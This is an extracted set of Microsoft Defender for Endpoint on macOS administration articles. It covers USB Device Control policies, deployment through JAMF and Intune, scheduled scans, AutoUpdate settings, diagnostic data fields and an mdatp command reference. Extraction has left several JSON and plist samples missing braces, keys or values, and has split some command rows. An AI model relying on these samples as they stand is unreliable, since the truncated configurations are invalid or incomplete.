"name": "Kingston Devices",
"query": {
"$type": "all",
"clauses": [
"$type": "vendorId",
"value": "0951"
Step 3: Rules: Create Deny policy for unallowed USBs
Create access policy rule and put into 'rules':
JSON
"rules": [
{
"id": "772cef80-229f-48b4-bd17-a69130092981",
"name": "Deny RWX to all Removable Media Devices except

Kingston",
"includeGroups": [
"3f082cd3-f701-4c21-9a6a-ed115c28e211"
],
"excludeGroups": [
"3f082cd3-f701-4c21-9a6a-ed115c28e212"
],
"entries": [
"$type": "removableMedia",
"id": "A7CEE2F8-CE34-4B34-9CFE-4133F0361035",
"enforcement": {
"$type": "deny"
},
"access": [
"read",
"write",
"execute"
},
"$type": "removableMedia",
"id": "18BA3DD5-4C9A-458B-A756-F1499FE94FB4",
"enforcement": {
"$type": "auditDeny",
"options": [
"send_event",
"show_notification"
},
"access": [
"read",
"write",
"execute"
In this case, only have one access rule policy, but if you have multiple, make sure to add
all into 'rules'.
See also
Deploy Device Control by using Intune
Deploy Device Control by using JAMF
Deploy Device Control manually
macOS Device Control frequently asked questions (FAQ)
 Tip
Feedback

Deploy and manage Device Control
using JAMF
Article • 07/18/2023
Applies to:

Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or
prevent the read, write, or execute access to removable storage, and allows you to
manage iOS and Portable device and Bluetooth media with or without exclusions.
Before you get started with Removable Storage Access Control, you must confirm your
Microsoft 365 subscription . To access and use Removable Storage Access Control, you
must have Microsoft 365 E3.
） Important
Deploy policy by using JAMF
Step 1: Create policy JSON

Now, you have 'groups' and 'rules' and 'settings', combine 'settings' and 'groups' and
rules into one JSON, here is the demo file: mdatp-
devicecontrol/deny_removable_media_except_kingston.json at main - microsoft/mdatp-
devicecontrol (github.com) . Make sure to validate your policy with the JSON schema
so your policy format is correct: mdatp-devicecontrol/device_control_policy_schema.json
at main - microsoft/mdatp-devicecontrol (github.com) .
See Device Control for macOS for information about settings, rules and groups.
Step 2: Update MDE Preferences Schema

The MDE Preferences schema has been updated to include the new
deviceControl/policy key. The existing MDE Preferences configuration profile should be
updated to use the new schema file's content.
Step 3: Add Device Control Policy to MDE Preferences

A new 'Device Control' property will now be available to add to the UX.
1. Select the topmost Add/Remove properties button, then select Device Control
and press Apply.

2. Next, scroll down until you see the Device Control property (it will be the
bottommost entry), and select Add/Remove properties directly underneath it.
3. Select Device Control Policy, and then click Apply.


4. To finish, copy and paste the Device Control policy JSON into the text box, and
save your changes to the configuration profile.

See also
 Tip
Feedback

Deploy and manage Device Control
using Intune
Article • 02/21/2024
Applies to:

Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or
prevent the read, write, or execute access to removable storage, and allows you to
manage iOS and Portable device and Bluetooth media with or without exclusions.
Before you get started with Removable Storage Access Control, you must confirm your
Microsoft 365 subscription . To access and use Removable Storage Access Control, you
must have Microsoft 365 E3.
Deploy policy by using Intune
Step 1: Build mobileconfig file

Now, you have groups , rules , and settings , replace the mobileconfig file with those
values and put it under the Device Control node. Here's the demo file: mdatp-
devicecontrol/demo.mobileconfig at main - microsoft/mdatp-devicecontrol
(github.com) . Make sure validate your policy with the JSON schema and make sure
your policy format is correct: mdatp-devicecontrol/device_control_policy_schema.json at
main - microsoft/mdatp-devicecontrol (github.com) .
７ Note
See Device Control for macOS for information about settings, rules and groups.
Deploy the mobileconfig file using Intune
You can deploy the mobileconfig file through https://endpoint.microsoft.com/ >
Devices > macOS:
select 'Create profile'

select 'Templates' and 'Custom'
See also
Deploy and manage Device Control using jamf
 Tip
Feedback

macOS Device Control policies
frequently asked questions (FAQ)
Article • 07/18/2023
Applies to:

This article provides answers to frequently asked questions about Device Control
capabilities in Microsoft Defender for Endpoint.
Questions | Answers
How do I know whether the machine is Device Control

enabled, and what is the Default Enforcement?
Answer: Run mdatp device-control policy preferences list to see all the iOS policies on this
machine:
How do I know whether the policy has been delivered to

the client machine?
Answer: Run mdatp device-control policy rules list to see all the iOS policies on this
machine:

Answer 2: Run mdatp device-control policy groups list to see all the iOS groups on this
machine:
See also
Deploy and manage Device Control using jamf
 Tip
Feedback

Schedule scans with Microsoft Defender
Article • 02/21/2024
Applies to:

） Important
Some information relates to a pre-released product feature in public preview which

may be substantially modified before it's commercially released. Microsoft makes
no warranties, express or implied, with respect to the information provided here.
７ Note
The built-in Scheduled Scan is currently in public preview. Review the prerequisites
carefully.
Schedule a scan built-in to Microsoft Defender

While you can start a threat scan at any time with Microsoft Defender for Endpoint, your
enterprise might benefit from scheduled or timed scans. For example, you can schedule
a scan to run at the beginning of every workday or week.
There are three types of scheduled scans that are configurable: hourly, daily, and weekly
scans. Hourly and daily scheduled scans are always run as quick scans, weekly scans can
be configured to be either quick or full scans. It is possible to have all three types of
scheduled scans at the same time. See the samples below. Pre-requisites:
Platform Update version: 101.23122.0005 or newer

Beta Channel (formerly Insiders-Fast), or Current Channel (Preview) (formerly
Insiders-Slow)
Schedule a scan with Microsoft Defender for
Endpoint on macOS
You can create a scheduled scan for your macOS, which is built in to Microsoft Defender
for Endpoint on macOS.
For more information on the .plist file format used here, see About Information Property
List Files at the official Apple developer website.
The following sample shows the daily and/or weekly configuration for the scheduled
scan on macOS.
 Tip
Schedules are based on the local time zone of the device.
ﾉ Expand table
Parameter The acceptable values for this parameter are:
scheduledScan enabled or disabled
scanType quick or full
ignoreExclusions true or false
lowPriorityScheduledScan true or false
dayOfWeek The range is between 0 and 8.

- 0: Everyday
- 1: Sunday
- 2: Monday
- 3: Tuesday
- 4: Wednesday
- 5: Thursday
- 6: Friday
- 7: Saturday
- 8: Never
timeOfDay Specifies the time of day, as the number of minutes after midnight, to
perform a scheduled scan. The time refers to the local time on the
computer. If you don't specify a value for this parameter, a scheduled
scan runs at a default time of two hours after midnight.
interval 0 (never), every 1 (hour) to 24 (hours, 1 scan per day)

Parameter The acceptable values for this parameter are:
randomizeScanStartTime Only applicable for daily quick scans or weekly quick/full scans.
Randomize the start time of the scan by up to specified number of
hours.
For example, if a scan is scheduled for 2 p.m and
randomizeScanStartTime is set to 2, the scan commences at a random
time between 2 p.m and 4 p.m.
Your scheduled scan runs at the date, time, and frequency you defined in your plist.
Example 1: Schedule a daily quick scan and weekly full

scan using a plist
In the following example, the daily quick scan configuration is set to run at 885 minutes
after midnight (2:45 p.m.).
The weekly configuration is set to run a full scan on Wednesday at 880 minutes after
midnight (2:40 p.m.). And it's set to ignore exclusions and run a low priority scan.
The following code shows the schema you need to use to schedule scans according to
the requirements above.
1. Open a text editor and use this example as a guide for your own scheduled scan
file.
XML

<dict>
<key>features</key>
<dict>
<key>scheduledScan</key>
</dict>
<dict>
<key>ignoreExclusions</key>
<true/>
<key>lowPriorityScheduledScan</key>
<true/>
<key>dailyConfiguration</key>
<dict>
<key>timeOfDay</key>
</dict>
<key>weeklyConfiguration</key>
<dict>
<key>dayOfWeek</key>
<key>scanType</key>
<string>full</string>
</dict>
</dict>
</dict>
</plist>
2. Save the file as com.microsoft.wdav.plist.
Example 2: Schedule an hourly quick scan, a daily quick

scan, and weekly full scan using a plist
In the following example, an hourly quick scan will run every 6 hours, a daily quick scan
configuration is set to run at 885 minutes after midnight (2:45 p.m.), and a weekly full
scan will run on Wednesdays at 880 minutes after midnight (2:40 p.m).
1. Open a text editor and use this example.
XML

<dict>
<key>features</key>
<dict>
</dict>
<dict>
<key>ignoreExclusions</key>
<true/>
<key>lowPriorityScheduledScan</key>
<true/>
<key>dailyConfiguration</key>
<dict>
<key>interval</key>
<string>1</string>
</dict>
<key>weeklyConfiguration</key>
<dict>
<key>dayOfWeek</key>
<key>scanType</key>
<string>full</string>
</dict>
</dict>
</dict>
</plist>
2. Save the file as com.microsoft.wdav.plist.
Option 3: Configure scheduled scans through CLI tool

To enable scheduled scan feature:
ﾉ Expand table
Version Command
Version 101.23122.* or sudo mdatp config scheduled-scan settings feature --value

higher enabled
To schedule hourly quick scans:
ﾉ Expand table
Version Command
Version 101.23122.* or sudo mdatp config scheduled-scan quick-scan hourly-interval --

higher value \<arg\>
To schedule daily quick scans:
ﾉ Expand table
Version Command
Version 101.23122.* or sudo mdatp config scheduled-scan quick-scan time-of-day --value

higher \<arg\>
To schedule weekly scans:
ﾉ Expand table
Version Command
Version 101.23122.* sudo mdatp config scheduled-scan weekly-scan --day-of-week \<arg\> -

or higher -time-of-day \<arg\>--scan-type \<arg\>
For other configuration options:
To check for definitions update before scheduled scans:
sudo mdatp config scheduled-scan settings check-for-definitions --value true
To use low priority threads for scheduled scanning:
sudo mdatp config scheduled-scan settings low-priority --value true
Check that the scheduled scan ran

Use the following command:
mdatp scan list
\<snip\>
） Important
Scheduled scans will not run at the scheduled time while the device is asleep. They
will instead run once the device resumes from sleep mode. If the device is turned
off, the scan will run at the next scheduled scan time.
 Tip
Feedback

Deploy updates for Microsoft Defender
Article • 10/12/2023
Applies to:


deliver new features.
２ Warning
Each version of Defender for Endpoint on macOS is set to expire automatically after
6 months. While expired versions continue to receive security intelligence updates,
we recommend that you install the latest version to get all available improvements
and enhancements.
To check the expiration date, run the following command:
Bash
mdatp health --field product_expiration
To update Microsoft Defender for Endpoint on macOS, a program named Microsoft

AutoUpdate (MAU) is used. MAU checks updates periodically, and automatically
downloads and installs them.

You can deploy preferences to configure how and when MAU checks for updates for the
Macs in your organization.
Use msupdate
MAU includes a command-line tool, called msupdate, that is designed for IT
administrators so that they have more precise control over when updates are applied.
Instructions for how to use this tool can be found in Update Office for Mac by using
msupdate.
In MAU, the application identifier for Microsoft Defender for Endpoint on macOS is
WDAV00. To download and install the latest updates for Microsoft Defender for
Endpoint on macOS, execute the following command from a Terminal window:
dos
cd /Library/Application\ Support/Microsoft/MAU2.0/Microsoft\
AutoUpdate.app/Contents/MacOS
./msupdate --install --apps wdav00
Set preferences for Microsoft AutoUpdate

This section describes the most common preferences that can be used to configure
MAU. These settings can be deployed as a configuration profile through the
management console that your enterprise is using. An example of a configuration
profile is shown in the following sections.
Set the channel name

The channel determines the type and frequency of updates that are offered through
MAU. Devices in Beta can try out new features before devices in Preview and Current .
The Current channel contains the most stable version of the product.
） Important
Prior to Microsoft AutoUpdate version 4.29, channels had different names:
Beta Channel was named InsiderFast (Insider Fast)
Current Channel (Preview) was named External (Insider Slow)
Current Channel was named Production
 Tip
In order to preview new features and provide early feedback, it is recommended

that you configure some devices in your enterprise to Beta or Preview .
ﾉ Expand table
Section Value
Domain com.microsoft.autoupdate2
Key ChannelName
Section Value
Data type String
Possible values Beta

Preview
Current
２ Warning
This setting changes the channel for all applications that are updated through
Microsoft AutoUpdate. To change the channel only for Microsoft Defender for
Endpoint on macOS, execute the following command after replacing [channel-
name] with the desired channel:
Bash
defaults write com.microsoft.autoupdate2 Applications -dict-add

"/Applications/Microsoft Defender.app" " { 'Application ID' = 'WDAV00'
; 'App Domain' = 'com.microsoft.wdav' ; LCID = 1033 ; ChannelName =
'[channel-name]' ; }"
Set update check frequency

Change how often MAU searches for updates.
ﾉ Expand table
Section Value
Key UpdateCheckFrequency
Data type Integer
Default 720 (minutes)

value
Comment This value is set in minutes. The allowed range is 240 minutes (4 hours) - 720
minutes (12 hours).
Change how MAU interacts with updates
Change how MAU searches for updates.
ﾉ Expand table
Section Value
Key HowToCheck
Data type String
Possible values Manual

AutomaticCheck
AutomaticDownload
Comment Note that AutomaticDownload will download and install silently if possible.
Change whether the "Check for Updates" button is

enabled
Change whether local users are able to click the "Check for Updates" option in the
Microsoft AutoUpdate user interface.
ﾉ Expand table
Section Value
Key EnableCheckForUpdatesButton
Data type Boolean
Possible values True (default)

False
Disable Insider checkbox

Set to true to make the "Join the Office Insider Program..." checkbox unavailable /
greyed out to users.
ﾉ Expand table
Section Value
Key DisableInsiderCheckbox
Data type Boolean
Possible values False (default)

True
Example configuration profile

The following configuration profile is used to:
Place the device in the Current channel

Automatically download and install updates
Enable the "Check for updates" button in the user interface
Allow users on the device to enroll into the Insider channels
２ Warning
The below configuration is an example configuration and should not be used in

production without proper review of settings and tailor of configurations.
Jamf Pro
XML

<dict>
<true/>
<false/>
</dict>
</plist>
Intune
XML

<plist version="1">
<dict>
<string>B762FF60-6ACB-4A72-9E72-459D00C936F3</string>
<string>com.microsoft.autoupdate2</string>
<string>Microsoft AutoUpdate settings</string>
<string>Microsoft AutoUpdate configuration settings</string>
<true/>
<true/>
<array>
<dict>
<string>5A6F350A-CC2C-440B-A074-68E3F34EBAE9</string>
<string>Microsoft AutoUpdate configuration settings</string>
<string/>
<true/>
<true/>
<false/>
</dict>
</array>
</dict>
</plist>
To configure MAU, you can deploy this configuration profile from the management tool
that your enterprise is using:
From Jamf Pro, upload this configuration profile and set the Preference Domain to
com.microsoft.autoupdate2.
From Intune, upload this configuration profile and set the custom configuration
profile name to com.microsoft.autoupdate2.
Resources
msupdate reference
 Tip
Feedback

Privacy for Microsoft Defender for
Endpoint on macOS
Article • 02/07/2023
Applies to:

Microsoft is committed to providing you with the information and controls you need to
make choices about how your data is collected and used when you're using Microsoft
This topic describes the privacy controls available within the product, how to manage
these controls with policy settings and more details on the data events that are
collected.
Overview of privacy controls in Microsoft

This section describes the privacy controls for the different types of data collected by
Diagnostic data
Diagnostic data is used to keep Microsoft Defender for Endpoint secure and up to date,
detect, diagnose and fix problems, and also make product improvements.
Some diagnostic data is required, while some diagnostic data is optional. We give you
the ability to choose whether to send us required or optional diagnostic data through
the use of privacy controls, such as policy settings for organizations.
There are two levels of diagnostic data for Microsoft Defender for Endpoint client
software that you can choose from:
Required: The minimum data necessary to help keep Microsoft Defender for
Endpoint secure, up to date, and performing as expected on the device it's
installed on.
Optional: Additional data that helps Microsoft make product improvements and
provides enhanced information to help detect, diagnose, and remediate issues.
By default, only required diagnostic data is sent to Microsoft.
Cloud delivered protection data

Cloud delivered protection is used to provide increased and faster protection with
access to the latest protection data in the cloud.
Enabling the cloud-delivered protection service is optional, however it's highly

recommended because it provides important protection against malware on your
endpoints and across your network.
Sample data
Sample data is used to improve the protection capabilities of the product, by sending
Microsoft suspicious samples so they can be analyzed. Enabling automatic sample
submission is optional.
When this feature is enabled and the sample that is collected is likely to contain
personal information, the user is prompted for consent.
Manage privacy controls with policy settings

If you're an IT administrator, you might want to configure these controls at the
enterprise level.
The privacy controls for the various types of data described in the preceding section are
described in detail in Set preferences for Microsoft Defender for Endpoint on macOS.
As with any new policy settings, you should carefully test them out in a limited,
controlled environment to ensure the settings that you configure have the desired effect
before you implement the policy settings more widely in your organization.
Diagnostic data events

This section describes what is considered required diagnostic data and what is
considered optional diagnostic data, along with a description of the events and fields
that are collected.
Data fields that are common for all events
There's some information about events that is common to all events, regardless of
category or data subtype.
The following fields are considered common for all events:
ﾉ Expand table
Field Description
platform The broad classification of the platform on which the app is running.
Allows Microsoft to identify on which platforms an issue may be
occurring so that it can correctly be prioritized.
machine_guid Unique identifier associated with the device. Allows Microsoft to

identify whether issues are impacting a select set of installs and how
many users are impacted.
sense_guid Unique identifier associated with the device. Allows Microsoft to

org_id Unique identifier associated with the enterprise that the device
belongs to. Allows Microsoft to identify whether issues are impacting
a select set of enterprises and how many enterprises are impacted.
hostname Local device name (without DNS suffix). Allows Microsoft to identify
whether issues are impacting a select set of installs and how many
users are impacted.
product_guid Unique identifier of the product. Allows Microsoft to differentiate

issues impacting different flavors of the product.
app_version Version of the Microsoft Defender for Endpoint on macOS application.

Allows Microsoft to identify which versions of the product are showing
an issue so that it can correctly be prioritized.
sig_version Version of security intelligence database. Allows Microsoft to identify

which versions of the security intelligence are showing an issue so that
it can correctly be prioritized.
supported_compressions List of compression algorithms supported by the application, for

example ['gzip'] . Allows Microsoft to understand what types of
compressions can be used when it communicates with the application.
release_ring Ring that the device is associated with (for example Insider Fast,
Insider Slow, Production). Allows Microsoft to identify on which
release ring an issue may be occurring so that it can correctly be
prioritized.
Required diagnostic data
Required diagnostic data is the minimum data necessary to help keep Microsoft
Defender for Endpoint secure, up to date, and perform as expected on the device it's
installed on.
Required diagnostic data helps to identify problems with Microsoft Defender for
Endpoint that may be related to a device or software configuration. For example, it can
help determine if a Microsoft Defender for Endpoint feature crashes more frequently on
a particular operating system version, with newly introduced features, or when certain
Microsoft Defender for Endpoint features are disabled. Required diagnostic data helps
Microsoft detect, diagnose, and fix these problems more quickly so the impact to users
or organizations is reduced.
Software setup and inventory data events

Microsoft Defender for Endpoint installation / uninstallation:
The following fields are collected:
ﾉ Expand table
Field Description
correlation_id Unique identifier associated with the installation.
version Version of the package.
severity Severity of the message (for example Informational).
code Code that describes the operation.
text Additional information associated with the product installation.
Microsoft Defender for Endpoint configuration:
ﾉ Expand table
Field Description
antivirus_engine.enable_real_time_protection Whether real-time protection is enabled on

the device or not.
Field Description
antivirus_engine.passive_mode Whether passive mode is enabled on the

device or not.
cloud_service.enabled Whether cloud delivered protection is

enabled on the device or not.
cloud_service.timeout Time out when the application

communicates with the Microsoft Defender
for Endpoint cloud.
cloud_service.heartbeat_interval Interval between consecutive heartbeats

sent by the product to the cloud.
cloud_service.service_uri URI used to communicate with the cloud.
cloud_service.diagnostic_level Diagnostic level of the device (required,

optional).
cloud_service.automatic_sample_submission Whether automatic sample submission is

turned on or not.
cloud_service.automatic_definition_update_enabled Whether automatic definition update is

turned on or not.
edr.early_preview Whether the device should run EDR early

preview features.
edr.group_id Group identifier used by the detection and

response component.
edr.tags User-defined tags.
features.[optional feature name] List of preview features, along with whether

they're enabled or not.
Product and service usage data events

Security intelligence update report:
ﾉ Expand table
Field Description
from_version Original security intelligence version.

Field Description
to_version New security intelligence version.
status Status of the update indicating success or failure.
using_proxy Whether the update was done over a proxy.
error Error code if the update failed.
reason Error message if the updated filed.
Product and service performance data events for required

diagnostic data
Unexpected application exit (crash):
Collects system information and the state of an application when an application

unexpectedly exits.
ﾉ Expand table
Field Description
v1_crash_count Number of times V1 engine process crashed every hour on client machine
v2_crash_count Number of times V2 engine process crashed every hour on client machine
EDR_crash_count Number of times EDR process crashed every hour on client machine
Kernel extension statistics:
ﾉ Expand table
Field Description
version Version of Microsoft Defender for Endpoint on macOS.
instance_id Unique identifier generated on kernel extension startup.
trace_level Trace level of the kernel extension.
subsystem The underlying subsystem used for real-time protection.

Field Description
ipc.connects Number of connection requests received by the kernel extension.
ipc.rejects Number of connection requests rejected by the kernel extension.
ipc.connected Whether there's any active connection to the kernel extension.
Support data
Diagnostic logs:
Diagnostic logs are collected only with the consent of the user as part of the feedback
submission feature. The following files are collected as part of the support logs:
All files under /Library/Logs/Microsoft/mdatp/

Subset of files under /Library/Application Support/Microsoft/Defender/ that are
created and used by Microsoft Defender for Endpoint on macOS
Subset of files under /Library/Managed Preferences that are used by Microsoft
/Library/Logs/Microsoft/autoupdate.log
$HOME/Library/Preferences/com.microsoft.autoupdate2.plist
Optional diagnostic data

Optional diagnostic data is additional data that helps Microsoft make product
improvements and provides enhanced information to help detect, diagnose, and fix
issues.
If you choose to send us optional diagnostic data, required diagnostic data is also
included.
Examples of optional diagnostic data include data Microsoft collects about product
configuration (for example number of exclusions set on the device) and product
performance (aggregate measures about the performance of components of the
product).
Software setup and inventory data events for optional diagnostic

data

ﾉ Expand table
Field Description
connection_retry_timeout Connection retry time out when

communication with the cloud.
file_hash_cache_maximum Size of the product cache.
crash_upload_daily_limit Limit of crash logs uploaded daily.
antivirus_engine.exclusions[].is_directory Whether the exclusion from scanning is a

directory or not.
antivirus_engine.exclusions[].path Path that was excluded from scanning.
antivirus_engine.exclusions[].extension Extension excluded from scanning.
antivirus_engine.exclusions[].name Name of the file excluded from scanning.
antivirus_engine.scan_cache_maximum Size of the product cache.
antivirus_engine.maximum_scan_threads Maximum number of threads used for

scanning.
antivirus_engine.threat_restoration_exclusion_time Time out before a file restored from the

quarantine can be detected again.
antivirus_engine.threat_type_settings Configuration for how different threat types

are handled by the product.
filesystem_scanner.full_scan_directory Full scan directory.
filesystem_scanner.quick_scan_directories List of directories used in quick scan.
edr.latency_mode Latency mode used by the detection and

response component.
edr.proxy_address Proxy address used by the detection and

response component.
Microsoft Auto-Update configuration:
ﾉ Expand table
Field Description
how_to_check Determines how product updates are checked (for example automatic or
manual).
Field Description
channel_name Update channel associated with the device.
manifest_server Server used for downloading updates.
update_cache Location of the cache used to store updates.
Product and service usage
Diagnostic log upload started report

ﾉ Expand table
Field Description
sha256 SHA256 identifier of the support log.
size Size of the support log.
original_path Path to the support log (always under /Library/Application

Support/Microsoft/Defender/wdavdiag/).
format Format of the support log.
metadata Information about the content of the support log.
Diagnostic log upload completed report
ﾉ Expand table
Field Description
request_id Correlation ID for the support log upload request.
blob_sas_uri URI used by the application to upload the support log.
Product and service performance data events for product and

service usage
Unexpected application exits and the state of the application when that happens.
ﾉ Expand table
Field Description
pkt_ack_timeout The following properties are aggregated numerical

values, representing count of events that happened since
kernel extension startup.
pkt_ack_conn_timeout
ipc.ack_pkts
ipc.nack_pkts
ipc.send.ack_no_conn
ipc.send.nack_no_conn
ipc.send.ack_no_qsq
ipc.send.nack_no_qsq
ipc.ack.no_space
ipc.ack.timeout
ipc.ack.ackd_fast
ipc.ack.ackd
ipc.recv.bad_pkt_len
ipc.recv.bad_reply_len
ipc.recv.no_waiter
ipc.recv.copy_failed
ipc.kauth.vnode.mask
ipc.kauth.vnode.read
ipc.kauth.vnode.write
ipc.kauth.vnode.exec
Field Description
ipc.kauth.vnode.del
ipc.kauth.vnode.read_attr
ipc.kauth.vnode.write_attr
ipc.kauth.vnode.read_ex_attr
ipc.kauth.vnode.write_ex_attr
ipc.kauth.vnode.read_sec
ipc.kauth.vnode.write_sec
ipc.kauth.vnode.take_own
ipc.kauth.vnode.link
ipc.kauth.vnode.create
ipc.kauth.vnode.move
ipc.kauth.vnode.mount
ipc.kauth.vnode.denied
ipc.kauth.vnode.ackd_before_deadline
ipc.kauth.vnode.missed_deadline
ipc.kauth.file_op.mask
ipc.kauth_file_op.open
ipc.kauth.file_op.close
ipc.kauth.file_op.close_modified
ipc.kauth.file_op.move
ipc.kauth.file_op.link
ipc.kauth.file_op.exec
ipc.kauth.file_op.remove
ipc.kauth.file_op.unmount
ipc.kauth.file_op.fork
ipc.kauth.file_op.create
Resources
Privacy at Microsoft
 Tip
Feedback

Resources for Microsoft Defender for
Endpoint on macOS
Article • 02/26/2024
Applies to:

Collecting diagnostic information

If you can reproduce a problem, increase the logging level, run the system for some
time, and restore the logging level to the default.
1. Increase logging level:
Bash
mdatp log level set --level debug
Output
Log level configured successfully
2. Reproduce the problem
3. Run sudo mdatp diagnostic create to back up the Microsoft Defender for
Endpoint logs. The files will be stored inside a .zip archive. This command will also
print out the file path to the backup after the operation succeeds.
 Tip
By default, diagnostic logs are saved to /Library/Application

Support/Microsoft/Defender/wdavdiag/ . To change the directory where
diagnostic logs are saved, pass --path [directory] to the below command,
replacing [directory] with the desired directory.
Bash
sudo mdatp diagnostic create
Console
Diagnostic file created: "/Library/Application

Support/Microsoft/Defender/wdavdiag/932e68a8-8f2e-4ad0-a7f2-
65eb97c0de01.zip"
4. Restore logging level:
Bash
mdatp log level set --level info
Console

If an error occurs during installation, the installer will only report a general failure.
The detailed log will be saved to /Library/Logs/Microsoft/mdatp/install.log . If you

experience issues during installation, send us this file so we can help diagnose the cause.
For further troubleshooting installation issues, please review Troubleshoot installation
issues for Microsoft Defender for Endpoint on macOS
Uninstalling
７ Note
Before uninstalling Microsoft Defender for Endpoint on macOS, please offboard per
Offboard non-Windows devices.
There are several ways to uninstall Microsoft Defender for Endpoint on macOS. Note
that while centrally managed uninstall is available on JAMF, it is not yet available for
Microsoft Intune.
Interactive uninstallation
Open Finder > Applications. Right click on Microsoft Defender for Endpoint >
Move to Trash.
Supported output types

Supports table and JSON format output types. For each command, there's a default
output behavior. You can modify the output in your preferred output format using the
following commands:
-output json
-output table
From the command line

sudo '/Library/Application Support/Microsoft/Defender/uninstall/uninstall'
Using JAMF Pro

To uninstall Microsoft Defender for Endpoint on macOS using JAMF Pro upload the
offboarding profile.
The offboarding profile should be uploaded without any modifications, and with
Preference Domain name set to com.microsoft.wdav.atp.offboarding:

Configuring from the command line
Important tasks, such as controlling product settings and triggering on-demand scans,
can be done from the command line:
ﾉ Expand table
Group Scenario Command
Configuration Turn on/off antivirus passive mdatp config passive-mode --value

mode [enabled/disabled]
Configuration Turn on/off real-time mdatp config real-time-protection --value

protection [enabled/disabled]
Configuration Turn on/off cloud protection mdatp config cloud --value

[enabled/disabled]
Configuration Turn on/off product mdatp config cloud-diagnostic --value

diagnostics [enabled/disabled]
Configuration Turn on/off automatic mdatp config cloud-automatic-sample-

sample submission submission --value [enabled/disabled]
Configuration Turn on/audit/off PUA mdatp threat policy set --type

protection potentially_unwanted_application -- action
[block/audit/off
Configuration Add/remove an antivirus mdatp exclusion process [add/remove] --path

exclusion for a process [path-to-process] or mdatp exclusion process
[add\|remove] --name [process-name]
Configuration Add/remove an antivirus mdatp exclusion file [add/remove] --path

exclusion for a file [path-to-file]
Configuration Add/remove an antivirus mdatp exclusion folder [add/remove] --path

exclusion for a directory [path-to-directory]
Configuration Add/remove an antivirus mdatp exclusion extension [add/remove] --name

exclusion for a file extension [extension]
Configuration List all antivirus exclusions mdatp exclusion list
Configuration Configure degree of mdatp config maximum-on-demand-scan-threads -

parallelism for on-demand -value [numerical-value-between-1-and-64]
scans
Configuration Turn on/off scans after mdatp config scan-after-definition-update --

security intelligence updates value [enabled/disabled]
Configuration Turn on/off archive scanning mdatp config scan-archives --value

(on-demand scans only) [enabled/disabled]
Configuration Turn on/off file hash mdatp config enable-file-hash-computation --

computation value [enabled/disabled]
Protection Scan a path mdatp scan custom --path [path] [--ignore-

exclusions]
Protection Do a quick scan mdatp scan quick
Protection Do a full scan mdatp scan full
Protection Cancel an ongoing on- mdatp scan cancel

demand scan
Protection Request a security mdatp definitions update

intelligence update
Configuration Add a threat name to the mdatp threat allowed add --name [threat-
allowed list name]
Configuration Remove a threat name from mdatp threat allowed remove --name [threat-
the allowed list name]
Configuration List all allowed threat names mdatp threat allowed list
Protection Print the full protection mdatp threat list

history history
Protection Get threat details mdatp threat get --id [threat-id]

history
Quarantine List all quarantined files mdatp threat quarantine list

management
Quarantine Remove all files from the mdatp threat quarantine remove-all
management quarantine
Quarantine Add a file detected as a mdatp threat quarantine add --id [threat-id]
management threat to the quarantine
Quarantine Remove a file detected as a mdatp threat quarantine remove --id [threat-
management threat from the quarantine id]
Quarantine Restore a file from the mdatp threat quarantine restore --id [threat-
management quarantine. Available in id] --path [destination-folder]
version lower than

101.23092.0012.
Quarantine Restore a file from the mdatp threat restore threat-id --id [threat-
management quarantine with Threat ID. id] --destination-path [destination-folder]
Available in Defender for
Endpoint version
101.23092.0012 or higher.
Quarantine Restore a file from the mdatp threat restore threat-path --path
management quarantine with Threat [threat-original-path] --destination-path
Original Path. Available in [destination-folder]
version 101.23092.0012 or
higher.
Network Configure the Network mdatp config network-protection enforcement-

Protection Protection enforcement level level --value [Block/Audit/Disabled]
Configuration
Network Check Network protection mdatp health --field

Protection has been started successfully network_protection_status
management
Device Control Is Device Control enabled, mdatp device-control policy preferences list
management and what is the Default
Enforcement?
Device Control What Device Control policy mdatp device-control policy rules list
management is enabled?
Device Control What Device Control policy mdatp device-control policy groups list
management groups are enabled?
Configuration Turn on/off data loss mdatp config data_loss_prevention --value

prevention [enabled/disabled]
Diagnostics Change the log level mdatp log level set --level
[error/warning/info/verbose]
Diagnostics Generate diagnostic logs mdatp diagnostic create --path [directory]
Health Check the product's health mdatp health
Health Check for a specific product mdatp health --field [attribute:

attribute healthy/licensed/engine_version...]
EDR EDR list exclusions (root) mdatp edr exclusion list

[processes|paths|extensions|all]
EDR Set/Remove tag, only mdatp edr tag set --name GROUP --value
GROUP supported [name]
EDR Remove group tag from mdatp edr tag remove --tag-name [name]
device
EDR Add Group ID mdatp edr group-ids --group-id [group]
How to enable autocompletion

To enable autocompletion in bash, run the following command and restart the Terminal
session:
Bash
echo "source /Applications/Microsoft\

Defender.app/Contents/Resources/Tools/mdatp_completion.bash" >>
~/.bash_profile
To enable autocompletion in zsh:
Check whether autocompletion is enabled on your device:
zsh
cat ~/.zshrc | grep autoload
If the preceding command does not produce any output, you can enable
autocompletion using the following command:
zsh
echo "autoload -Uz compinit && compinit" >> ~/.zshrc
Run the following commands to enable autocompletion for Microsoft Defender for
Endpoint on macOS and restart the Terminal session:
zsh
sudo mkdir -p /usr/local/share/zsh/site-functions
sudo ln -svf "/Applications/Microsoft

Defender.app/Contents/Resources/Tools/mdatp_completion.zsh"
/usr/local/share/zsh/site-functions/_mdatp
Client Microsoft Defender for Endpoint

quarantine directory
/Library/Application Support/Microsoft/Defender/quarantine/ contains the files
quarantined by mdatp . The files are named after the threat trackingId. The current
trackingIds is shown with mdatp threat list .
Microsoft Defender for Endpoint portal

information
The Microsoft Defender for Endpoint blog, EDR capabilities for macOS have now
arrived provides detailed guidance on what to expect.
 Tip
Feedback

Microsoft Defender for Endpoint plug-in
for Windows Subsystem for Linux (WSL)
Article • 12/13/2023
Overview
The Windows Subsystem for Linux (WSL) 2, which replaces the previous version of WSL
(supported by Microsoft Defender for Endpoint without a plug-in), provides a Linux
environment that is seamlessly integrated with Windows yet isolated using virtualization
technology. The Microsoft Defender for Endpoint for Windows Subsystem for Linux 2
(WSL) plug-in enables Defender for Endpoint to provide more visibility into all running
WSL containers, by plugging into the isolated subsystem.
Known issues and limitations

Be aware of the following before you start:
1. The plug-in doesn't yet automatically update. When a new plug-in version is
released, the new MSI package needs to be applied to perform the update. You
can apply the new package by using any tool that deploys software. Updates are
coming soon through Microsoft Update. If preferred, you can continue to use the
MSI package method.
2. As it takes a few minutes for the plug-in to fully instantiate and up to 30 minutes
for a WSL2 instance to onboard itself, short-lived WSL container instances might
result in the WSL2 instance not showing up in the Microsoft Defender portal
